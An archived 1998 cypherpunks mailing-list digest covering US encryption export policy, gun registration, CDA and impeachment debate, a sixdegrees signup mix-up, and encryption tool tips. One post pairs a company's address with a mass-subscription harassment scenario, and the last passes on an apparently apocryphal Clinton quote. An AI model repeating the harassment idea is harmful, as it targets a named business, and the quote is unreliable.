From: John Young <jya@pipeline.com>
Date: Wed, 16 Sep 1998 11:19:12 +0800
To: cypherpunks@toad.com
Subject: US Updates Crypto Policy
Message-ID: <199809161613.MAA07615@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



http://library.whitehouse.gov/PressReleases-plain.cgi?date=0&briefing=3

                              THE WHITE HOUSE

                       Office of the Press Secretary

____________________________________________________________________
For Immediate Release
September 16, 1998


                     STATEMENT BY THE PRESS SECRETARY

                 Administration Updates Encryption Policy


     The Clinton Administration today announced a series of steps to update
its encryption policy in a way that meets the full range of national
interests:  promotes electronic commerce, supports law enforcement and
national security and protects privacy.  These steps are a result of
several months of intensive dialogue between the government and U.S.
industry, the law enforcement community and privacy groups that was called
for by the Vice President and supported by members of Congress.

     As the Vice President stated in a letter to Senator Daschle, the
Administration remains committed to assuring that the nation?s law
enforcement community will be able to access, under strictly defined legal
procedures, the plain text of criminally related communications and stored
information.   The Administration intends to support FBI?s establishment of
a technical support center to help build the technical capacity of law
enforcement - Federal, State, and local - to stay abreast of advancing
communications technology.

     The Administration will also strengthen its support for electronic
commerce by permitting the export of strong encryption when used to protect

sensitive financial, health, medical, and business proprietary information
in electronic form.  The updated export policy will allow U.S. companies
new opportunities to sell encryption products to almost 70 percent of the
world?s economy, including the European Union, the Caribbean and some Asian
and South American countries.  These changes in export policy were based on
input from industry groups while being protective of national security and
law enforcement interests.

     The new export guidelines will permit exports to other industries
beyond financial institutions, and further streamline exports of key
recovery products and other recoverable encryption products.  Exports to
those end users and destination countries not addressed by today?s
announcement will continue to be reviewed on a case-by-case basis.

     Very strong encryption with any key length (with or without key
recovery) will now be permitted for export, under license exception, to
several industry sectors.   For example, U.S. companies will be able to
export very strong encryption for use between their headquarters and their
foreign subsidiaries worldwide except the seven terrorist countries (Iran,
Iraq, Libya, Syria, Sudan, North Korea and Cuba) to protect their sensitive
company proprietary information.

     On-line merchants in 45 countries will be able to use robust U.S.
encryption products to protect their on-line electronic commerce
transactions with their customers over the Internet.

     Insurance companies as well as the health and medical sectors in those
same 46 countries will be able to purchase and use robust U.S. encryption
products to secure health and insurance data among legitimate users such as
hospitals, health care professionals, patients, insurers and their
customers.

     The new guidelines also allow encryption hardware and software
products with encryption strength up to 56-bit DES or equivalent to be
exported without a license, after a one time technical review, to all users
outside the seven terrorist countries.    Currently, streamlined exports of
DES products are permitted for those companies that have filed key recovery
business plans.  However, with the new guidelines, key recovery business
plans will no longer be required.

     The Administration will continue to promote the development of key
recovery products by easing regulatory requirements.   For the more than 60
companies which have submitted plans to develop and market key recovery
encryption products, the six month progress reviews will no longer be

required.  Once the products are ready for market, they can be exported,
with any bit length -- without a license -- world-wide (except to terrorist
nations) after a one-time review.   Furthermore, exporters will no longer
need to name or submit additional information on a key recovery agent prior
to export.  These requirements will be removed from the regulations.

     Finally, industry has identified other so-called "recoverable"
products and techniques that allow for the recovery of plaintext by a
system or network administrator and that can also assist law enforcement
access, subject to strict procedures.   The Administration will permit
their export for use within most foreign commercial firms, and their
wholly-owned subsidiaries, in large markets, including Western Europe,
Japan and Australia, to protect their internal business proprietary
communications.

     The Administration welcomes a continued dialogue with U.S. industry
and intends to review its policy in one year to determine if additional
updates may be necessary to continue a balanced approach that protects the
public safety and national security, ensures privacy, enables continued
technology leadership by U.S. industry and promotes electronic commerce.


                                   # # #







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Wed, 16 Sep 1998 11:18:51 +0800
To: "cdn-firearms-digest@broadway.sfn.saskatoon.sk.ca>
Subject: Political purges and Bill C-68
Message-ID: <199809161614.MAA06660@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



Hi to all of you.  I know most of you personnally, except for the posts to 
mailing lists and public organisms.

------------------ beginning of letter ---------------
Yesterday night, around 2am, I was unable to sleep and surfing the TV 
channels up until I fell on a movie on the ShowCase channel.  This channel 
is devoted to repertoire cinema and less mainstream movies.

As I flick to this channel, I see something I can't take my eyes off for 
it's overwhelming revolting topic:  a bunch of corpses are on a dolly, each 
of one being tied by the feet to a crane cable and quickly, efficiently 
taken away to a big heap of corpses.

Then, a lineup of peoples, waiting in line to pass before some officer.  
They are promplty urged to take off their clothes, aligned to face a wall 
and shot in the back of the head.  And this continues like an dis-assembly 
chain.  

I did not bear more than a few minutes of the thing.  During thoses few 
minutes, maybe five or six rows of five peoples were slaughtered.  Peoples 
of all walk of life, of all ages, young and olds, male and females, 
beautiful and ugly, strugling or resigned were executed by an indifferent 
row of unintelligent and/or psychotic thugs that simply "executed orders".  
There was the firing squad captain that did not shoot but that gave the 
firing orders, so that the thugs could sleep without remorse.  There was 
their superior supervising the whole slaughterhouse operation and finally, 
there was the political supervisor, dressed in the "de rigueur" grey with 
grey hat.  This operation was clearly in the context of some political 
purge.

I did not comprehend the full details of the context, but it appeared that 
it was happening during the russian revolution, or more possibly in East 
Germany after WW-II.

The executed peoples were helpless, at the mercy of thoses thugs because 
they had no way to respond to death threat by death threat.  Most of them 
had accepted their fate and walked to their death attempting to defend 
themselves with calm reason, useless in this context since the firing squad 
was composed of idiots and psychotics.  One girls pleaded for her life and 
her great beauty made the animals of the firing squad hesitate, but was 
promptly shot in the head from a distance by the political supervisor.

And it dawned on me that it could never had happened in a society where gun 
ownership was unregulated, and it also dawned on me that it is the essence 
of the natural outcome of all gun regulation/registration schemes.  That to 
provide that kind of power  to the ruling political class is the ultimate 
goal of gun registration and regulation, notwithstanding that they chose to 
exert it or not.

Very soon (in principle on october 1st 1998), under the new bill C-68 , you 
will be declared a criminal in the full sense of the law, just as if you had 
killed somebody, if you don't register your guns (or don't plan to do so 
before the limit date comes up in a few years).

Putting aside for a moment the tremendous costs associated with that C-68 
nonsense (around 2 billions $ wasted money) we must realize that private 
law-abiding firearm owners account for 0.08% of all homicides commited with 
a firearms.

So, I ask because I consider it of extreme importance, what's the ULTIMATE 
purpose of declaring criminal seven millions of individuals who wants 
nothing more than lead peacefull lifes?
----------- end of letter --------------

Jean-Francois Avon, Montreal, Canada

Hitler, Stalin, Pinochet, PolPot and every other notorious psychotic 
butchers insisted on a tight control of privately owned firearms.  I wonder 
why?

"nobody runs faster than a bullet"   - supposedly from Idi Amin Dada

Jean-Francois Avon, B.Sc. Physics, Montreal, Canada
  DePompadour, Socit d'Importation Lte
     Limoges fine porcelain and french crystal
  JFA Technologies, R&D physicists & engineers
     Instrumentation & control, LabView programming
PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 16 Sep 1998 14:07:46 +0800
To: cypherpunks@Algebra.COM
Subject: Would Congress have been affected by the CDA?
In-Reply-To: <199809161729.TAA18190@replay.com>
Message-ID: <v03130302b225bb692515@[209.66.100.50]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:29 AM -0700 9/16/98, Anonymous wrote:

>Had the Communications Decency Act withstood
>judicial review (which it did not), posting the
>Starr report to the Internet arguably would have
>subjected the posters to fines of $250,000 and 5
>years in prison.

You're missing an important point: when has government not found ways to
exempt itself from laws? Whether the laws are about Social Security,
overtime, quotas for hiring, or even libel and slander, Congress and the
other branches exempt themselves. How convenient.

I don't know for sure if buried in Section 17, Paragraph 42  of the CDA was
an exemption for Official Government Documents, but I expect lawyers
would've found ample ways to publish what they want to publish. Amongst
other things, there would be many problems in forcing official documents,
court reports, executive findings, etc., to be bowdlerized to meet the CDA
requirements.

And the burrowcrats just _love_ to have laws which apply to the sheeple,
and not to them.

So I wouldn't make too much of this "apparent violation" of the CDA.

Don't forget that throughout history bluenoses and puritans have gotten off
on holding up examples of thoughtcrime.

--Tim May

(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "BulletProof Customer Support" <support@bulletproof.com>
Date: Wed, 16 Sep 1998 14:21:11 +0800
To: cypherpunks@toad.com
Subject: JDesignerPro 3.0 Enterprise Edition
Message-ID: <19980916190405551.AXZ392@www.bulletproof.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi Cypher,

Do you remember downloading JDesignerPro from the Microsoft
Site Builder Network?  As a Microsoft partner, BulletProof wants you to 
know about our latest product annoucements. We have just
released JDesignerPro 3.0 Enterprise Edition.

We know that you may be too busy to download and try new
software so we've put together a multimedia demonstation that runs for
just 5 minutes. It's in AVI format and can be downloaded from our home 
page. See below for the link. We strongly encourage you to take 10 
minutes to download the demo and run it. You'll quickly see whether 
JDesignerPro 3.0 has the features that meet your needs.

BulletProof Corp, known worldwide as a leading vendor in the Java RAD
tools business, has just released JDesignerPro 3.0.  This is a major new 
version of our widely used Java Intranet toolset.  BulletProof has worked 
hard on this release which includes enhanced client-side development and
deployment and two completely new breakthrough additions for the 
server-side.

                                         JDesignerPro 3.0 
                                            Main Features

*  The Client Application Builder enhanced.      Visual Client-side RAD
development in pure Java.  This is the #1 database application development
tool if you are building for the Intranet.  It includes over a dozen
built-in, professional data-bound components, built-in deployment system, 
access control and data-access server. Interface and Interaction code 
generation with detailed wizards - requires little or no coding of Java.

*  New Visual Server-Side Development.     For the first time ever the new
Method Explorer(tm) makes visual server-side development possible thanks
to a graphical view of how Java classes are put together.  With only mouse
clicks you can explore any Java class in seconds to instantly see how 
methods and variables in your class interact. This has never been achieved 
before in any programming language. The Method Explorer is a must-see 
feature.

*  The New Enteprise Server.      The Enterprise Server combines our
existing middleware server with a complete suite of new features and a 
powerful management console.  This new product gives you exceptional 
control over how your server processes are executed and managed. For 
the first time you now have all the job management features that before 
were only available on Mainframe computers. Job scheduling, queuing, 
prioritization and detailed logging are all included leaving you only the 
work of programming your business logic. We have also included EJB 
support, server push and much more. If you have any sort of backend 
process to run daily, weekly or at other set intervals or based on events, 
the Enterprise Server is for you.

We have always believed that JDesignerPro could be the premier system for
developing and deploying an Intranet System in Java. With the new
Enterprise Edition JDesignerPro includes everything from visual client and 
server development to client and server deployment. JDesignerPro is now 
truly a world class solution.

JDesignerPro is 100% Java and runs on any Java platform. A database and
JDBC driver are required for non Windows platforms. Server side requires 
Java 1.1, client is 1.02 and up compatible.

As always BulletProof has a 30-day free trial of JDesignerPro 3.0 waiting
for you on our website (only 4 MB download).  The multimedia demo is also
available on our site. It is only 2.5MB. Give it a try today:

http://www.bulletproof.com/

JDesignerPro 3.0 has far too many new features to list in an email. If you
want to know whether JDesignerPro has a feature you're looking for 
please email us and we'll tell you exactly how JDP will meet your needs.

Thank you for taking the time to read about JDesignerPro 3.0. We believe
you'll save so much time using JDesignerPro you may get Fridays Off!

Sincerely,
The BulletProof Team
support@bulletproof.com
800-505-0105


To be removed from our mailing list please reply to this with "remove" in
the subject.
 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 16 Sep 1998 11:33:28 +0800
To: cypherpunks@toad.com
Subject: US Crypto Update Fact Sheet
Message-ID: <199809161625.MAA31953@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



http://library.whitehouse.gov/PressReleases-plain.cgi?date=0&briefing=4

The White House Briefing Room
September 16, 1998
FACT SHEET


                              THE WHITE HOUSE

                       Office of the Press Secretary

______________________________________________________________________
For Immediate Release
September 16, 1998


                                FACT SHEET

                 Administration Updates Encryption Policy


    Exports of 56-bit DES and equivalent products (hardware and software)
     will be streamlined (under license exception).  Requirements for key
     recovery plans are eliminated.

    Exports of unlimited strength encryption products (with or without key
     recovery) will be streamlined (under license exception) to certain
     industries.  The sectors are:

    Subsidiaries of U.S. Firms, worldwide (except seven terrorist nations).

    Insurance companies to the same 45 countries recently approved for
     exports to banks and financial institution exports.

    Health and medical organizations (including civilian government health
     agencies) in the same 45 countries.  Does not include
     biochemical/pharmaceutical manufacturers.

    On-line merchants for client-server applications, in the same 45
   countries, with the purpose of securing electronic transactions between
   merchants and their customers.  Does not include manufacturers and
   distributors of items controlled on the U.S. munitions list.

    Key Recovery products will continue to be exportable under license
     exception worldwide (except seven terrorist nations).  Review of
     foreign key recovery agents is eliminated.

    Exports of "recoverable" products will be approved to most commercial
     firms, and their wholly-owned subsidiaries, in a broad range of
     countries under encryption licensing arrangements.  This group of
     countries covers most major commercial markets including Western
     Europe, Japan, and Australia.  The policy does not include service
     providers and manufacturers and distributors of items controlled on
     the U.S. munitions list.

    Exports to end users or destinations outside this policy are possible
     on a case-by-case basis.

    Prior to export, products are subject to a one-time product technical
     review.

                                   # # #








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 16 Sep 1998 11:55:49 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Clinton's fake apologies (fwd)
Message-ID: <199809161720.MAA07023@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: 16 Sep 1998 16:47:28 -0000
> From: Anonymous <nobody@remailer.ch>
> Subject: Re: Clinton's fake apologies (fwd)

> Presumably he should lie to protect the state.

Then don't take the oath:

To tell the truth, the whole truth, and nothing but the truth.

 So lieing per se isn't the problem.
> It is the use of the privilege where it doesn't apply that upsets you.

No, it's the fact that he took an oath to tell the truth and didn't.

 Murky water
> for impeachment, methinks.

Then you don't think very well.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sixdegrees"<90cd50e1@auto.sixdegrees.com>
Date: Wed, 16 Sep 1998 11:43:54 +0800
To: "Jolly CyberSnot"<cypherpunks@toad.com>
Subject: Your new password
Message-ID: <199809161636.JAA23664@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Name: Jolly CyberSnot
sixdegrees password: suchlamp

Congratulations Jolly. You're well on your way to 
becoming a full sixdegrees(tm) member. Here is your member 
password: suchlamp. Use it to log-in on the home page 
at the sixdegrees Web site, http://www.sixdegrees.com. 
We'll ask you for a little more information to complete your 
registration, and then you'll be ready to start networking. 

It's important that you return to the site and log-in. Your 
membership will not be complete until you do so.

Once you've successfully logged in with your password, just go 
to Personal Profile and you'll be able to choose your own 
password.

Thanks for becoming part of sixdegrees. We're looking forward 
to seeing you at the site. 

====================================================================
PLEASE NOTE: All replies to this address are processed by a computer.
If you believe you received this e-mail in error, and it was not your 
intention to become a sixdegrees member, or if you have any problems, 
questions or requests send an e-mail to issues@sixdegrees.com
and someone will get back to you as soon as possible.
====================================================================


E.SI.BAM.1




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Wed, 16 Sep 1998 14:40:00 +0800
To: "'cypherpunks@cyberpass.net>
Subject: RE: It's finally over (was Re: Explanation of Harald Fragner and  cypherpunks)
Message-ID: <33CCFE438B9DD01192E800A024C84A19284687@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




> ---Mark Salamon <mark@sixdegrees.com> wrote:
> >
> > Thanks for the reply.  I have now received about 10 such 
> > replies.  We will take them to heart, remove the cypherpunks 
> > and attempt to deal with the mailing list issue in an 
> > intelligent way.

Most lists and services have dealt with the problem of someone
accidentally subscribing or maliciously subscribing someone else in one
of two ways:

A) send and acknowledgement message with a randomly generated
authorization code that requires the user to respond.
B) send out a password and require the user to login before account is
activated.

This works only if you assume the malicious individual will not receive
mail sent to that address. This therefore falls down when the address is
a mailing list or other distribution point that the malicious individual
has access to directly or via archives.

What we really need is an automated system that could authorize/deny an
address prior to the code/password being sent that would keep track of
distribution list addresses and such.

Perhaps I'll create one myself soon.

	Matt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Wed, 16 Sep 1998 11:41:07 +0800
To: cypherpunks@cyberpass.net
Subject: Re: US Updates Crypto Policy
Message-ID: <199809161642.MAA01758@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From: John Young <jya@pipeline.com>
   >
   >   http://library.whitehouse.gov/PressReleases-plain.cgi?date=0&briefing=3
   >
   >                                 THE WHITE HOUSE
   >   ____________________________________________________________________
   >   For Immediate Release
   >   September 16, 1998
   >
   >                    Administration Updates Encryption Policy
   [snip]
   >        Very strong encryption with any key length (with or without key
   >   recovery) will now be permitted for export, under license exception, to
   >   several industry sectors.
   [snip]
   >        On-line merchants in 45 countries will be able to use robust U.S.
   >   encryption products to protect their on-line electronic commerce
   >   transactions with their customers over the Internet.

On-line merchants?

Anyone care to try and purchase US-strong crypto from overseas
for their WWW business? Which crypto products?

What are the minimum "business" requirements? ;-)
---guy

   How long does it take to get approval?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Wed, 16 Sep 1998 12:08:40 +0800
To: AIMSX@aol.com
Subject: Re: Larry Gilbert, AOLers, and the Hyper-real flamer
In-Reply-To: <c6a5eb38.35feedbd@aol.com>
Message-ID: <35FFEE4E.24B7466D@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



AIMSX@aol.com wrote:
 
> Actually.. I am getting a SunOS Shell account this weekend.  AOL has improved
> service somewhat, and it is now possible to use Netscape (or any other
> browser) along with it.

Okay, so you're getting a shell account, good for you.
 
> I also have over 100 accounts on a local ISP - so trust me... it's not that
> big of a deal for me to get another ISP, I just like some of the keywords and
> a few other areas.

Something smells vaguely like rotten tuna, you already have 100 accounts on a
local ISP. Why does anyone need more than one account on any ISP?  That being
the case, why do you need another account for on a SunOS box?

If the ISP is >>>>LOCAL<<<< to you, why do you need to dial AOL to use all the
32 bit TCP/IP protocols?  Why not dial up to the ISP and use PPP? Why do you
need to post from AOL when you can post from one of your over 100 ISP accounts?
 
> As for your thought that it is a CHOICE for everyone... well, I am sorry to
> say it is not.  My parent would rather use the [semi]- user-friendly software
> of AOL, which she is familiar with, than have a dialup access with browsers
> and other utilities in different areas she can't find as easily.  (I know, it
> sounds stupid.)

Damn straight it's stupid, but not your mom: So fucking which is it?  Either
you have a hundred (and now 101) accounts on local ISP's >OR< you're forced to
use AOL by your clueless mom.
 
> getting a shell account, and not all AOLers are stupid warez lovers that don't
> know cu from cd.

> I am sure there are morons on other ISP's, they are just more visible on AOL.

That's obvious.  Some of them have over 100 accounts on the same ISP, and are
truly so full of shit, that they're swimming in it.  Kid, by bullshiting, all
you're doing is enforcing the view that AOL users are really AOLusers.

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|       Sunder       |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@anon.olymp.org>
Date: Wed, 16 Sep 1998 15:37:45 +0800
To: cypherpunks@toad.com
Subject: Re: Is nym.alias.net down?
Message-ID: <d5e1dd2cdbbb5321cef293eec4b0dfb4@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:
> 
> Is nym.alias.net down? I've sent a request twice using
> a different remailer chain each time yet it still doesn't
> reply. It's been about two days since I sent it in.
> 
> I did however create a nym with dongco.hyperreal.art.pl.
> Is this service reliable? or will it disppear quickly?

Please, try creating a testxxx by direct mail first. Then
upgrade to a remailer chain. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart Troyan <btroyan@yahoo.com>
Date: Wed, 16 Sep 1998 12:30:27 +0800
To: cypherpunks@toad.com
Subject: It's finally over (was Re: Explanation of Harald Fragner and cypherpunks)
Message-ID: <35FFF486.A3DD8B9A@yahoo.com>
MIME-Version: 1.0
Content-Type: text/plain



---Mark Salamon <mark@sixdegrees.com> wrote:
>
> Thanks for the reply.  I have now received about 10 such replies.  We
> will take them to heart, remove the cypherpunks and attempt to deal with
> the mailing list issue in an intelligent way.
> 
> And thanks, but we have enough magazine subscriptions already.  :)
> 
> Mark
> 
> Bart Troyan wrote:
> > 
> > OK, here's what happened.  Someone signed up for sixdegrees using one or
> > more of the cypherpunks addresses as their address, either deliberately in
> > order to cause problems like this, or accidentally, not realizing what
> > would happen.
> > 
> > The real-world analogy would be for me and all my friends to get a bunch of
> > magazines, rip out all those postage-paid subscription flaps, and fill out
> > your name and address on each of them, then you'd have unwanted trial
> > subscriptions to lots and lots of magazines.
> > 
> > hmmmm...
> > MacroView
> > 90 William Street, Suite 301
> > New York, NY 10038
> > 
> > Wouldn't that suck?  Can you imagine if 1000 people did that to you all the
> > same day?  (this is *not* a threat, just an example).  You'd have bags and
> > bags of zines and bills coming in daily...
> > 
> > As I am sure you are aware, the net makes it REALLY EASY to screw someone
> > over like that, by signing them up for all sorts of things with little
> > effort.  Even if you remove all the cypherpunks addresses, someone can come
> > along and do it again.  There must be a permanent solution...how about
> > hardcoding a block on signing up with an address containing the string
> > "cypherpunks" in your email software?  Why should thousands of us on
> > cypherpunks all have to do our own filtering to delete everything from
> > @sixdegrees.com and still have to waste all that bandwidth when one site is
> > the source of all of it, and it could be eradicated with a simple
> > programming change?
> > 
> > I assure you this is not the last time you'll see this problem occur--there
> > are thousands of mailing lists out there, and lots of vindictive former
> > subscribers for each one that would love to annoy everyone on the list for
> > a while...  and signing a list up for sixdegrees does the trick quite
> > efficiently.
> > 
> > -Bart
> > 
> > Mark Salamon wrote:
> > > What is confusing to me is that the email you received from sixdegrees
> > > (with the subject:  Harald Fragner) is one that would be sent ONLY to a
> > > CONFIRMED sixdegrees user.  That means that once upon a time, whether
> > > you remember or not, you joined sixdegrees (as have over 1,000,000
> > > people to date).  It also appears that you listed Harald Fragner as a
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 16 Sep 1998 12:28:29 +0800
To: "Jean-Francois Avon" <cdn-firearms-digest@broadway.sfn.saskatoon.sk.ca>
Subject: Re: Political purges and Bill C-68
In-Reply-To: <199809161614.MAA06660@cti06.citenet.net>
Message-ID: <199809161722.NAA01433@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



>Very soon (in principle on october 1st 1998), under the new bill C-68 , you 
>will be declared a criminal in the full sense of the law, just as if you had 
>killed somebody, if you don't register your guns (or don't plan to do so 
>before the limit date comes up in a few years).

Plenty of public storage facilities on this side of the border.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Wed, 16 Sep 1998 15:32:48 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: Encrypting files.
Message-ID: <33CCFE438B9DD01192E800A024C84A1928468C@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain



PGP International for file encryption, NTSentry or BestCrypt for
virtual-disk encryption.

PGP International
STFM
BestCrypt
http://www.jetico.sci.fi/bcnt.htm
NTSentry
http://www.softwinter.com/sentry.html

All are outside the US.

If anyone has other good recommendations, please add them.

	Matt

> -----Original Message-----
> From: Lars Weitze [mailto:chromedemon@netcologne.de]

> Does anyone now a program for WindozeNT to store encrypted 
> data on harddisk.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Elliott <melliott@ncsa.uiuc.edu>
Date: Wed, 16 Sep 1998 13:47:46 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: Democracy...
In-Reply-To: <33CCFE438B9DD01192E800A024C84A1928467E@mossbay.chaffeyhomes.com>
Message-ID: <v04020504b225b82b6978@[141.142.103.240]>
MIME-Version: 1.0
Content-Type: text/plain



>As with most the constitution, however, this is theory, not practice. In
>practice there are many laws and case precedence establishing and
>preferring certain religious practices, particularly the institution of
>marriage.

The congress doesn't pass laws regarding marriages.  That is all up to
individual states.



Matt <mailto:melliott@itmail.ncsa.uiuc.edu>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 16 Sep 1998 13:38:14 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: Democracy... (fwd)
Message-ID: <199809161903.OAA08336@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: Democracy...
> Date: Wed, 16 Sep 1998 11:00:09 -0700

> Unless you can show me a religion that does not involve a god or gods,
> and although etymologically unjustified I would claim one that does not
> involve *faith*, then I would say you could NOT be both an atheist and
> religious. Agnostic perhaps, but not an atheist. You can be
> contradictory and hypocritical and claim you are many things, but we are
> talking about a coherent philosophy.

Try pantheism. If one fundamentaly believes that god does not exist, which
clearly involves faith, then yes it is a religion. A religion is a belief
system that provides a relationship between the individual and the totality
of all else (the cosmos if you'll allow me).

By your view an agnostic can't be religion since it is the recognition of
a *lack* of faith, clearly something you require to be religous. An atheist
says that god could exist but doesn't - clearly an act of faith.

There are fundamentaly two types of religions, those that recognize some for
of transcendance and those that don't. Quibbling over what is the 'correct'
form of transcendence is as irrelevant as arguing over the 'correct'
religion.

In either case the same failure to understand human psychology is committed.
In short it is the axiomatic assumption that there *is* a single anything
that will satisfy everyone.

> You can be both spiritual and an atheist. Spirituality does not require
> faith in any external mystical element or being.

What do you mean by 'spiritual'? Are you refering to a ghost-in-the-machine
either at the individual or cosmological level? Whether one believes that
mystical element is external (which if you understood God would clearly be
seen to be a non sequitar with the rest of your argument) or internal is 
irrelevant.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Wed, 16 Sep 1998 16:06:08 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: 128 bit or 40 bit?
Message-ID: <33CCFE438B9DD01192E800A024C84A1928468E@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




> All browsers have the 128 bits encryption inthem, but in the
> non-US version it can only enabled by a 'special cert'.

So what makes it so "special?" A special CA? What happens when that
special CA expires, cannot the user add/modify certs, or does everyone
need to patch their MSIE (or whatever) when that happens.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Wed, 16 Sep 1998 14:11:09 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Clinton still doesnt get it
In-Reply-To: <199809161800.UAA20746@replay.com>
Message-ID: <199809161911.PAA23405@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <199809161800.UAA20746@replay.com>, on 09/16/98 
   at 08:00 PM, Anonymous <nobody@replay.com> said:

>Watch TV and learn the answer.

Of course, why didn't I think of that! If it's on TV it *must* be true!!

I would write more but I have to go watch CNN for my daily dose of
Goodspeak so I can think Goodthoughts.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: My best view from a Window was through OS/2.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNgAPXo9Co1n+aLhhAQFwFgP/ZM79Cnho28TqEefiZBrZHTb8bm+80ygq
LPZJYainq8wSVgG6mTDpxovBbsCwvYA911KzjxESKwjRI6vjzZYoGyoWJBjX02Qx
n9H3S1QxTIm9XkKw6Dqd+KN8STKk1VzNHhqkL+BGrNEsqvZGC7qhQjHCpXIjfAU8
CEb7KQNUq68=
=fn9o
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William J. Hartwell" <billh@ibag.com>
Date: Wed, 16 Sep 1998 16:35:26 +0800
To: cypherpunks@Algebra.COM
Subject: fascinating quote........
Message-ID: <3.0.5.32.19980916143302.00860df0@mail.xroads.com>
MIME-Version: 1.0
Content-Type: text/plain



This was passed to me by a friend, it may have already made it here and I
missed it. If so forgive the redundant post.






"Yes, the president should resign.  He has lied to the American people,
time and time again, and betrayed their trust.  Since he has admitted guilt,
there is no reason to put the American people through an impeachment.

He will serve absolutely no purpose in finishing out his term, the only
possible solution is for the president to save some dignity and resign."

- From 12th Congressional District Hopeful William Jefferson Clinton
